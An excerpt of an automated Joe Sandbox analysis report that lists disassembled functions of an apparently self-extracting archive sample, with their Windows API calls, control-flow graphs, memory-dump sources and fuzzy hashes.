                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 12d78106d343dc2b10d80f39238cf1fe65fbd6c25aed3bf536a0c80790213537
                                                            • Instruction ID: 5eeecdab786c916c5123317c2fc7bcfc00880b4dbb0c3b6d6e7ae5198f2146fc
                                                            • Opcode Fuzzy Hash: 12d78106d343dc2b10d80f39238cf1fe65fbd6c25aed3bf536a0c80790213537
                                                            • Instruction Fuzzy Hash: 17F0827660066876DB2056259C09F9F76AC9B46B41F484051BA05A21C0D760EA41C5F6
                                                            Function 00BEDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1070 bedbde-bedc09 call beec50 SetEnvironmentVariableW call be0371 1074 bedc0e-bedc12 1070->1074 1075 bedc36-bedc38 1074->1075 1076 bedc14-bedc18 1074->1076 1077 bedc21-bedc28 call be048d 1076->1077 1080 bedc1a-bedc20 1077->1080 1081 bedc2a-bedc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BEDBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BEDC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 1b4ff2ef81e465a3af917905cb9c717dc60396f829a10d8a182f4361e3865232
                                                            • Instruction ID: e29553c8908fa43f1bea754bf75f544c92e264610dd35bc0a15f6930fa3281df
                                                            • Opcode Fuzzy Hash: 1b4ff2ef81e465a3af917905cb9c717dc60396f829a10d8a182f4361e3865232
                                                            • Instruction Fuzzy Hash: 31F0EC72504264A7CF202F968C06BFF37ECEF087C1B140491BD8595291D7F08980DAB0
                                                            Function 00BD9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1082 bd9785-bd9791 1083 bd979e-bd97b5 ReadFile 1082->1083 1084 bd9793-bd979b GetStdHandle 1082->1084 1085 bd97b7-bd97c0 call bd98bc 1083->1085 1086 bd9811 1083->1086 1084->1083 1090 bd97d9-bd97dd 1085->1090 1091 bd97c2-bd97ca 1085->1091 1088 bd9814-bd9817 1086->1088 1092 bd97df-bd97e8 GetLastError 1090->1092 1093 bd97ee-bd97f2 1090->1093 1091->1090 1094 bd97cc 1091->1094 1092->1093 1096 bd97ea-bd97ec 1092->1096 1097 bd980c-bd980f 1093->1097 1098 bd97f4-bd97fc 1093->1098 1095 bd97cd-bd97d7 call bd9785 1094->1095 1095->1088 1096->1088 1097->1088 1098->1097 1100 bd97fe-bd9807 GetLastError 1098->1100 1100->1097 1102 bd9809-bd980a 1100->1102 1102->1095
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00BD9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BD97AD
                                                            • GetLastError.KERNEL32 ref: 00BD97DF
                                                            • GetLastError.KERNEL32 ref: 00BD97FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 001c1a832398f0f81354a55fa9b099638e854dfe1eff16c0b7ff89028dceac43
                                                            • Instruction ID: 85b50f279f227f70e415c5af5cc3a7e17f21aac461d580e2c380953cb0d958e1
                                                            • Opcode Fuzzy Hash: 001c1a832398f0f81354a55fa9b099638e854dfe1eff16c0b7ff89028dceac43
                                                            • Instruction Fuzzy Hash: 3D11C230910204EBDF205F64C84476DB7E8FB02BA4F1085ABF81A95390F7758E44EB61
                                                            Function 00BFAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BF3F73,00000000,00000000,?,00BFACDB,00BF3F73,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue), ref: 00BFAD66
                                                            • GetLastError.KERNEL32(?,00BFACDB,00BF3F73,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue,00C07970,FlsSetValue,00000000,00000364,?,00BF98B7), ref: 00BFAD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BFACDB,00BF3F73,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue,00C07970,FlsSetValue,00000000), ref: 00BFAD80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: b5d9920fcfcb53d31bcc403c9279aaf1e5c15321451cc2d3419d991bf201953e
                                                            • Instruction ID: 94e06753727e53362def964e668e4be6229d873cd59a11b1f69c0aae40b9d50f
                                                            • Opcode Fuzzy Hash: b5d9920fcfcb53d31bcc403c9279aaf1e5c15321451cc2d3419d991bf201953e
                                                            • Instruction Fuzzy Hash: 0401FC7E61123AABC7254F689C84B6BBBDCEF057A27110670FA0AD3561D720D905C6E1
                                                            Function 00BD9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BDD343,00000001,?,?,?,00000000,00BE551D,?,?,?), ref: 00BD9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BE551D,?,?,?,?,?,00BE4FC7,?), ref: 00BD9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BDD343,00000001,?,?), ref: 00BDA011
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: baeb3fb42793af7c99a452658291ff43606dcbcf09052294941814d31751898a
                                                            • Instruction ID: 8d2201a14ed2c33487052271bcd64103da1abdf266c41bb49ed8f011e98b0101
                                                            • Opcode Fuzzy Hash: baeb3fb42793af7c99a452658291ff43606dcbcf09052294941814d31751898a
                                                            • Instruction Fuzzy Hash: F631CE71208345AFDB14CF20D858BAEB7E9EF84714F04495AF9819B390D775AE48CBA2
                                                            Function 00BDA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BDC27E: _wcslen.LIBCMT ref: 00BDC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: ab3fb12a2c4930e9229645f2c92d10ba41ce2c5a3c945c646d67f288f84ec4ae
                                                            • Instruction ID: e168f3a9dbd7a56998fb90dceed6d309a8bcb16b76b0d8df2c9ed364d88328e4
                                                            • Opcode Fuzzy Hash: ab3fb12a2c4930e9229645f2c92d10ba41ce2c5a3c945c646d67f288f84ec4ae
                                                            • Instruction Fuzzy Hash: 4C01B131200250AAEF21AB754C49BEDB6CDDF0A794F044497F902E6381F768CB81C6BA
                                                            Function 00BFB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BFB8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: bb31967d30534c1d89315a1b7489819b8ad190639e787901a273432f42d4c610
                                                            • Instruction ID: 514f797f0bd3341be92b3cf57143b549b9f2559a6768d315b3da95f09e2195c7
                                                            • Opcode Fuzzy Hash: bb31967d30534c1d89315a1b7489819b8ad190639e787901a273432f42d4c610
                                                            • Instruction Fuzzy Hash: DE41F87050428C9ADF218E68CC84FFABBEDDB45304F1444EDE79A87142D375AA49CF60
                                                            Function 00BFAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BFAFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: c14a24b0af036ee519914232905b7f7f0c380393261c123cc2f8dbf794720c16
                                                            • Instruction ID: 76abc2ae849a2cc4de9a72f02242bd7ae21371d6755be633905d3905eef62987
                                                            • Opcode Fuzzy Hash: c14a24b0af036ee519914232905b7f7f0c380393261c123cc2f8dbf794720c16
                                                            • Instruction Fuzzy Hash: EA01087254421DBBCF069F90DC06EEE7FA6EF08750F054294FE1866161CA329A31EB91
                                                            Function 00BFAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BFA56F), ref: 00BFAF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 8fe5a5d60a90a79a4acf24bd26e61c3f2274d658ae642ae4a63f547e347b0211
                                                            • Instruction ID: 7b1fdf182cec26f40b5eb157401d305f1b7eb45ec19cf9e2e3a813d02e5bf6ef
                                                            • Opcode Fuzzy Hash: 8fe5a5d60a90a79a4acf24bd26e61c3f2274d658ae642ae4a63f547e347b0211
                                                            • Instruction Fuzzy Hash: 4BF0E971A4521CBFCF0A6F55CC06EAEBFA5EF08711B4141A4FD089B260DA315E10D7D5
                                                            Function 00BFADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: 40913c408f541b08005a79d2cba7f074780ffd42ad78a6dd18af26aa5808fe65
                                                            • Instruction ID: 1521297240ea555c54227954f26c331f066bf2a02d14cf194740791f7dd2864d
                                                            • Opcode Fuzzy Hash: 40913c408f541b08005a79d2cba7f074780ffd42ad78a6dd18af26aa5808fe65
                                                            • Instruction Fuzzy Hash: E4E0E571A8521C7BC609AB65DC06F7EBB94DB48721B0202F9F90997280CE706E10C6D6
                                                            Function 00BEEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEEAF9
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3Ro
                                                            • API String ID: 1269201914-1492261280
                                                            • Opcode ID: f9d39f4e09c0dd54816d39ed6a95236f56247b48ab761a66ac8721a61106c9b0
                                                            • Instruction ID: e9f3a2fb47f7d1d25d67deedf2b52832c48ff3742d67e2ba4458bc37e34b1182
                                                            • Opcode Fuzzy Hash: f9d39f4e09c0dd54816d39ed6a95236f56247b48ab761a66ac8721a61106c9b0
                                                            • Instruction Fuzzy Hash: 58B012C62AA0C27C750863021DC2C37014CC0C0BA0F30917EF424CC0C1EE81CC455431
                                                            Function 00BFBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BFB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BFBA44,?), ref: 00BFB7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BFBA89,?,00000000), ref: 00BFBC64
                                                            • GetCPInfo.KERNEL32(00000000,00BFBA89,?,?,?,00BFBA89,?,00000000), ref: 00BFBC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 6ab0918a803e0363ee25f367dd135b21cffe78fd68ece5f086bbe34abbe601ec
                                                            • Instruction ID: 0c713320dff683ddf0415633239aa6fd0a9739d48bb938ea04ea4f38bb8b213b
                                                            • Opcode Fuzzy Hash: 6ab0918a803e0363ee25f367dd135b21cffe78fd68ece5f086bbe34abbe601ec
                                                            • Instruction Fuzzy Hash: 32515578A0024D9EDB249F35C881EBBBBE4EF41300F2844FED6968B651D7349949CB91
                                                            Function 00BD9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BD9A50,?,?,00000000,?,?,00BD8CBC,?), ref: 00BD9BAB
                                                            • GetLastError.KERNEL32(?,00000000,00BD8411,-00009570,00000000,000007F3), ref: 00BD9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: b2408948a013de5d5855771925c87cc8d281e20bb8660c5fd8f2618371f0e3d0
                                                            • Instruction ID: 1a4da5a84e363061713599742bf1e59d2a823418135d5ea0c16cf08862cf64eb
                                                            • Opcode Fuzzy Hash: b2408948a013de5d5855771925c87cc8d281e20bb8660c5fd8f2618371f0e3d0
                                                            • Instruction Fuzzy Hash: 8B41DB316043418FDB24DF25E58496AF7E9FBD4320F168AAFE89583360F770ED448A91
                                                            Function 00BFBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BF97E5: GetLastError.KERNEL32(?,00C11030,00BF4674,00C11030,?,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF97E9
                                                              • Part of subcall function 00BF97E5: _free.LIBCMT ref: 00BF981C
                                                              • Part of subcall function 00BF97E5: SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF985D
                                                              • Part of subcall function 00BF97E5: _abort.LIBCMT ref: 00BF9863
                                                              • Part of subcall function 00BFBB4E: _abort.LIBCMT ref: 00BFBB80
                                                              • Part of subcall function 00BFBB4E: _free.LIBCMT ref: 00BFBBB4
                                                              • Part of subcall function 00BFB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BFBA44,?), ref: 00BFB7E6
                                                            • _free.LIBCMT ref: 00BFBA9F
                                                            • _free.LIBCMT ref: 00BFBAD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: e3191a189d0df71c8b9302b5346819b6ed23c3e1f5e06f88c7e9b3b618bf9139
                                                            • Instruction ID: ded22f7773f20c36befd34a244bac315e1c06a1be8c592898242e5afe7154ce4
                                                            • Opcode Fuzzy Hash: e3191a189d0df71c8b9302b5346819b6ed23c3e1f5e06f88c7e9b3b618bf9139
                                                            • Instruction Fuzzy Hash: 5A317C3190420DAFDB14EBA8D481FBDB7E5EF41320F2540D9EA149B2A2EF329D48DB50
                                                            Function 00BD1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD1E55
                                                              • Part of subcall function 00BD3BBA: __EH_prolog.LIBCMT ref: 00BD3BBF
                                                            • _wcslen.LIBCMT ref: 00BD1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
